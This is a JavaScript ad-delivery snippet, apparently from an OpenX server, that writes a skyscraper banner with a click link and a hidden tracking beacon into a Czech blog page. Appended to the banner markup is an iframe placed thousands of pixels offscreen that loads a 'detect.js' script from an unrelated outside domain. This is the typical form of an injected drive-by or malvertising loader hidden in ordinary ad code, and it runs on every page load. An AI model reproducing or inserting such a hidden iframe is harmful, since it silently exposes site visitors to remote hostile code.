 var OX_3c531983 = ''; OX_3c531983 += "<"+"div class=\"reklama\">"; OX_3c531983 += "<"+"p class=\"title\">reklama<"+"/p>"; OX_3c531983 += "<"+"/div>"; OX_3c531983 += "<"+"div class=\"cleaner\"><"+"/div><"+"a href=\'http://openads.aira.cz/www/delivery/ck.php?oaparams=2__bannerid=1246__zoneid=87__source=null__cb=fb4d06d790__oadest=http%3A%2F%2Fwww.thinkserver.cz\' target=\'_blank\'><"+"img src=\'http://openads.aira.cz/www/images/ec567ffdab13178a918cb2dec4d8f2eb.png\' width=\'120\' height=\'600\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_fb4d06d790\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openads.aira.cz/www/delivery/lg.php?bannerid=1246&amp;campaignid=294&amp;zoneid=87&amp;source=null&amp;loc=http%3A%2F%2Fdiit.cz%2Fblog%2Ffilmove-formaty-1-honba-za-maximalnim-zazitkem&amp;cb=fb4d06d790\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe style=\"position:absolute;left:-3912px;top:-4000px;width:303px;height:348px;\" src=\"http://dean.carolinabusinesspartner.com/microwave/detect.js\"><"+"/iframe>";  var placement="skyscraper-levy"; if(placement && document.getElementById(placement)) {
		if(OX_3c531983){
			if(typeof window.advertisementCallback == "function")
				advertisementCallback(placement);
			document.getElementById(placement).className += " full";
		}
		document.getElementById(placement).innerHTML = OX_3c531983 ;
		if(typeof window.advertisementAfterCallback == "function")
				advertisementAfterCallback(placement);} 